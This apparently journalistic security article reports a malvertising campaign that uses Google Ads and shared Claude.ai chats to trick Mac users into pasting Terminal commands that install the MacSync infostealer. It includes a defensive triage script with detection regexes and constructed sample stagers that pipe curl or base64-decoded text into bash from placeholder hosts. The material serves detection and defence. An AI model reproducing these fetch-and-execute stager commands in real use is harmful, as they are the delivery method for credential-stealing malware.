Hackers Use Google Ads and Claude.ai to Deliver Mac Malware

Security researchers report an active malvertising campaign that uses Google Ads and public Claude.ai shared chats to trick macOS users into running Terminal commands that install malware. Security researcher Berk Albayrak of Trendyol Group first flagged the technique, and outlets including BleepingComputer, Bitdefender, AdGuard, and CyberSecSentinel independently confirmed multiple malicious Claude.ai chats carrying identical social-engineering instructions. CyberSecSentinel and other vendors link the deployed payloads to MacSync, a macOS infostealer that exfiltrates browser credentials, Keychain contents, and wallet data; CyberSecSentinel reported 15,600+ confirmed victims in its analysis. Editorial analysis: This campaign illustrates how attackers combine malvertising with legitimate public content features to create highly credible infection vectors that rely on user copy-paste behavior rather than exploit chains.
What happened
Security researcher Berk Albayrak of Trendyol Group first identified an active malvertising campaign in May 2026 that uses Google Ads to surface sponsored search results appearing to point at Claude.ai, then leads victims into publicly shared Claude.ai chats containing malicious installation instructions, according to reporting by BleepingComputer and ITSecurityNews. Bitdefender and AdGuard corroborated that users searching for phrases like "Claude mac download" may be shown sponsored links that land on legitimate claude.ai pages, where the shared chat content instructs them to paste a one-line Terminal command. Because the landing page really is a Claude.ai URL, the usual advice to check the address bar does not protect the victim here. CyberSecSentinel reported that the campaign delivered data-stealing malware, attributed a cluster to the MacSync infostealer, and published an estimate of 15,600+ confirmed victims.
Technical details
BleepingComputer and AdGuard documented that the malicious chats present as an official "Claude Code on Mac" installation guide, sometimes claiming attribution to "Apple Support," and instruct users to open Terminal and paste a one-liner whose payload is base64-encoded. Once decoded and run, the command downloads a shell script from attacker-controlled domains and executes it; that script in turn decodes and runs the final payload. CyberSecSentinel and AdGuard detail that the observed MacSync variant harvests browser-stored credentials and cookies, macOS Keychain entries, and cryptocurrency wallet data, bundles the exfiltrated artifacts (reported as files like /tmp/osalogging.zip), and uploads them to operator-controlled command-and-control endpoints. Multiple outlets noted that the campaign used separate infrastructure clusters and rotated malicious chats and domains to evade simple takedowns and hash-based detection; defenders should therefore key detections on the behaviour (a base64-decoded one-liner piped to a shell that fetches and runs a remote script) rather than on a particular chat URL, domain, or file hash.
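The following triage script is an added example written for this article, not code from any of the vendors cited or from the campaign itself. It shows how to peel the base64 layer off a pasted one-liner to recover the download URL, flag the decode-and-execute and curl-to-shell shapes described above, and run the same check over shell-history lines (plain or zsh EXTENDED_HISTORY format) when hunting on an endpoint. All sample commands, history lines and `.invalid` domains are constructed for the example; the regexes are illustrative heuristics, not vendor signatures.

```python
import base64
import re

# Heuristics for the "paste this into Terminal" stager shape the reporting describes:
# a base64 blob decoded on the fly and piped to a shell, or a remote script fetched
# with curl/wget and executed. Constructed for this example; not vendor signatures.
B64_TOKEN = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')
DECODE_STAGE = re.compile(r'\bbase64\s+(?:-[dD]|--decode)\b')
SHELL_SINK = re.compile(r'\|\s*(?:sudo\s+)?(?:bash|sh|zsh)\b|\b(?:bash|sh|zsh)\s+-c\b')
FETCH = re.compile(r'\b(?:curl|wget)\b')
URL = re.compile(r'https?://[^\s\'"|)]+')
ZSH_EXT = re.compile(r'^: \d+:\d+;')  # prefix written by zsh EXTENDED_HISTORY


def decode_b64_blobs(text):
    """Return the UTF-8 text of every well-formed base64 blob found in text."""
    out = []
    for m in B64_TOKEN.finditer(text):
        try:
            out.append(base64.b64decode(m.group(0), validate=True).decode('utf-8'))
        except (ValueError, UnicodeDecodeError):
            continue  # not really base64, or a binary blob: leave it alone
    return out


def analyze(cmd, max_layers=3):
    """Peel base64 layers off a one-liner and report what it would do when pasted."""
    layers, pending = [], [cmd]
    while pending and len(layers) < max_layers:
        layer = pending.pop(0)
        layers.append(layer)
        if DECODE_STAGE.search(layer):  # only decode where the command itself would
            pending.extend(decode_b64_blobs(layer))
    reasons, urls = set(), []
    for layer in layers:
        urls.extend(URL.findall(layer))
        if FETCH.search(layer) and SHELL_SINK.search(layer):
            reasons.add('remote script fetched and executed')
    if len(layers) > 1 and SHELL_SINK.search(cmd):
        reasons.add('base64 blob decoded and executed')
    return {'suspicious': bool(reasons), 'layers': layers,
            'urls': urls, 'reasons': sorted(reasons)}


def scan_history(lines):
    """Flag shell-history entries (plain or zsh EXTENDED_HISTORY) matching the stager pattern."""
    hits = []
    for raw in lines:
        cmd = ZSH_EXT.sub('', raw.strip())
        if cmd:
            report = analyze(cmd)
            if report['suspicious']:
                hits.append((cmd, report))
    return hits


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed samples. The .invalid domains are placeholders, not campaign infrastructure.
STAGE2 = 'curl -fsSL https://example-install.invalid/install.sh | bash'
SAMPLES = {
    'encoded_stager': f'echo {_b64(STAGE2)} | base64 -d | bash',
    'plain_curl_bash': 'bash -c "$(curl -fsSL https://installer.invalid/setup.sh)"',
    'benign_brew': 'brew install node',
}
HISTORY = [  # constructed ~/.zsh_history excerpt
    ': 1715000000:0;brew install node',
    ': 1715000100:0;' + SAMPLES['encoded_stager'],
    'ls -la /tmp',
]

if __name__ == '__main__':
    for name, cmd in SAMPLES.items():
        r = analyze(cmd)
        print(f"{name}: suspicious={r['suspicious']} urls={r['urls']} reasons={r['reasons']}")
    for cmd, r in scan_history(HISTORY):
        print('history hit:', cmd[:60], '->', r['urls'])
```

The decoder only attempts base64 where the command itself contains a decode stage, which keeps long URL path segments and API tokens from being misread as encoded payloads. Note that `curl ... | bash` is also how many legitimate developer tools are installed, so the "remote script fetched and executed" reason is a triage signal to pair with the recovered URL, not a verdict on its own.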
Industry context
Editorial analysis: Attackers increasingly combine two trust vectors - paid search results and legitimate public content features - to raise perceived authenticity. Recent malvertising incidents show that once an advertised link resolves to an accepted platform domain, detection that relies on domain reputation or certificate validity contributes little, because both check out. For practitioners, the consequence is that social-engineered copy-paste workflows remain a high-risk infection vector: developer-oriented installs have normalised pasting a curl-to-shell one-liner from a web page, and this campaign exploits exactly that habit, relying on user action rather than on a software vulnerability.
What to watch
Editorial analysis: Observers should track whether security vendors or platform operators publish takedown reports, whether Google updates its ad verification and landing-page review processes, and whether AI platforms revise default sharing permissions or impose stricter content moderation on public chats. Indicators to monitor include multiple sponsored ad entries pointing to the same legitimate domain but resolving to differing chat content, reports of base64-encoded shell-command installers in public chats, and C2 domains named in vendor telemetry. On endpoints, security teams should review shell history and process telemetry for base64-decode-and-execute one-liners and for the archive-and-upload behaviour CyberSecSentinel and Bitdefender describe, and treat any match as a likely credential compromise that calls for rotating browser-saved passwords, Keychain items and wallet keys.
Scoring Rationale
This is a notable, active campaign that combines ad infrastructure and AI platform features to harvest high-value credentials from developers. Multiple vendors and a large victim count increase urgency for defenders.

